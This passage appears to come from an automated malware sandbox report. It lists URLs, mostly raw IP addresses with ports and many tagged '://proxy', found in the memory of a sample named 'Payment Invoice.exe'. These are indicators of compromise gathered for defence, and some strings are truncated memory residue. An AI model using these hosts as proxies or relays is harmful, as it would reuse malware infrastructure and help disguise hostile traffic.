                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.206
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.206://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.206:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.218
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.219://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.219:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.220
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.220://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.220:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.222
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.222://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.214.222:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.104
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.104://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.104:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.110://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.216.110:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.152
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.152://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.152:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.153://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.153:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.154:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.155
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.155://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.155:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.158
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.158://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.174.7.158:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.66
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631799F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.66://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.66:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.74://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.74:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.74p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.79
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.79://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.175.212.79:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.199.46.20:32100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.199.46.20:32100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.80://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.80:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.81
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.81:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.82://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.82:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.84
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.84://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.84:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.85
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.85://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.200.12.85:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.202.75.26
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.202.75.26://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.202.75.26:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.190.234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.190.234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.190.234:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.225
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.225://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.225:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.227
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.227://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.227:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.228
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.228://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.228:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.230
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.230://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.204.219.230:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.80://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.80:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.85:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.87
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.87://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.87:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.42
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.42://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.42:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.43
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.43://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.43:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.64
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.235.247.114:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.235.247.114:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:62607
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:62607://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:32423
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:32423://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:3580
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:3580://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:14738
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:14738://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:22450
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:22450://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23859
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23859://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:25492
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:25492://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:9367
